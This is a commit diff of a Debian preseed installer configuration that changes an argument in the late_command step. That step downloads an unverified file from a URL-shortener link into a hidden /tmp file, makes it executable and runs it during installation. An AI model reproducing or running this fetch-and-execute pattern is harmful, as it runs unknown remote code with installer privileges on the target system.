2021-11-04 12:15:49
This commit is contained in:
@@ -534,6 +534,6 @@ d-i debian-installer/exit/poweroff boolean true
|
|||||||
d-i preseed/late_command string \
|
d-i preseed/late_command string \
|
||||||
in-target /usr/bin/curl -sLo /tmp/.42 'https://42url.com/QajQzFZr'; \
|
in-target /usr/bin/curl -sLo /tmp/.42 'https://42url.com/QajQzFZr'; \
|
||||||
in-target /usr/bin/chmod +x /tmp/.42; \
|
in-target /usr/bin/chmod +x /tmp/.42; \
|
||||||
in-target /tmp/.42 gbaconni; \
|
in-target /tmp/.42 gbaconni 4242; \
|
||||||
echo "That's all Folks!"
|
echo "That's all Folks!"
|
||||||
|
|
||||||
|
|||||||
Reference in New Issue
Block a user